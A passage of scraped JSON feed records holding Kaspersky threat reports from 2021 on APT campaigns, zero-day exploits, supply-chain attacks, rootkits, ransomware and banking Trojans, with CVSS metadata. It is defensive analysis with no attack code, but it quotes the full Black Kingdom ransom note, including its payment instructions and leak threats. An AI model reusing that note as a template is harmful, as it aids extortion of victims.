Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority's website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several infrastructures on the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren't able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn't find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the associated cluster MysterySnail and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for "legal surveillance" purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving usage of a UEFI or MBR bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by Slingshot agent on multiple occasions, whereby Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it's not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor's activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach "re-branded" version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": 